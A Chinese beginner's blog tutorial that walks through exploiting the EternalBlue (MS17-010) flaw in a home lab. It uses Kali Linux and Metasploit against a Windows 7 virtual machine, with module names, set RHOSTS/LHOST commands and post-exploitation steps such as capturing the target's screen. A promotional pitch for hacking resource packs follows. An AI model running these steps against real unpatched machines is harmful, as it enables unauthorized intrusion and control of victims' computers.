网络安全小白学kali———“永恒之蓝”

前言：

​​​​​​​​​​​​​​Kali 学得好，牢饭吃得饱

！！！不可乱用，只能自己练习和学习使用 ！！！（法律风险，自己了解噢）

1. 安装：

工具：Kali Linux 、win7靶机、虚拟机

kali Linux下载：

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

下载虚拟机版本 VMware（虚拟机本人使用的是VMware虚拟机）下载（2.93G左右）

网站学习（工具）：

Kali Tools | Kali Linux Tools

win 镜像下载：
zgnaMSDN, 我告诉你 - 做一个安静的工具站

虚拟机（虚拟机有其他的，我个人推荐这个，其他的也很好）

VMware - Delivering a Digital Foundation For Businesses

（十分抱歉，我的是Mac电脑，所以下的vm有点区别，win版本不会下载可以留言，看见一定会教）

2. 下载后解压，双击.vmx虚拟机配置文件（这个时候就是虚拟机好处体现的时候啦，可以不用安装和配置网络环境等）

4）进入页面后输入用户和密码（都是kali）

5）此处建议先学一些dos命令和基本的Linux使用，不会也没很大问题，但是最好要会！

6）进入终端（kali有2种方式，win进入可以菜单右键单击任务栏上的Windows图标，打开WinX菜单（快捷键：Win+X））

7）此处给出新手使用失败情况（有经验的大神可以跳过 7）看 8）处）

a）大小写问题

     b）win7下载是32位（请注意永恒之蓝漏洞只支持64位win7，其他的一些系统也支持，此处我们使用的是win7，所以只介绍win7。）

    c）win7未关闭防火墙，导致连不上。

8）查看网络ip

a）虚拟机win7:

    1.同时按住电脑win键和r键打开搜索框并输入cmd,然后按回车键。

    2.之后在打开的命令行里面输入这串ipconfig,回车。

    3.接着就可以看到网络对应的ip了。

b）虚拟机kali:

    1.进入终端，输入命令ifconfig（大小写问题！！！）

    2.扫描网段命令：fping -asg xxx.xxx.xxx.xxx/xx  （fping: netmask must be between 1 and 32）

9）使用msf（metasploit有兴趣百度了解，很流行的工具）

       ！！！特别声明！！！不可乱用乱攻击，是违法犯罪行为

    a）进入管理员root模式：sudo su

     b）输入命令msfconsole

c）搜索永恒之蓝编号search ms17_010

d）利用编号配置use 0

e）输入show options ，查看信息

f）找到win7之前的IP地址（前面有噢！）输入set RHOSTS ～再run运行（这里报错可能防火墙没有关或者系统不是64位，上面有总结，可以看看。）

成功：

g）输入help 可以查看可以干些什么（如控制鼠标、截图，关机等等，不方便展示，请自行了解学习，因为是虚拟机，可以一个个试一试玩一下，不要去攻击他人计算机。）

eg1：利用msf的exploit模块进行攻击exploit/windows/smb/ms17_010_eternalblue

    1）基本配置（ip地址、端口号）

2）执行攻击命令，此处我攻击的是拍摄靶机屏幕

3）成功（在kali的home文件夹可以看见前面拍摄的靶机桌面照片）

eg2:监听靶机

    1）输入 use exploit/windows/smb/ms17_010_eternalblue，进入。

    2）输入show options，查看配置，记住kali的ip（终端输入ifconfig）

            我的kali ip是192.168.126.133

3）查看win7靶机的ip（进入终端输入ipconfig）

            我的win7靶机ip是192.168.126.136

     5）设置监听ip地址：set lhost 192.168.～.～(可以用show options查看配置情况)

输入目标地址（被监听靶机ip地址）：

            set rhost 192.168.～.～(可以用show options查看配置情况)

​​​​​​​ ​​​​​​​
6）运行exploit

    成功：        ​​​​​​​ 

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料，希望对想学习 网络安全的小伙伴们有帮助！

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

【点击领取】优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。【点击领取视频教程】

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本【点击领取技术文档】

（都打包成一块的了，不能一一展开，总共300多集）

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本【点击领取书籍】

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取
优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享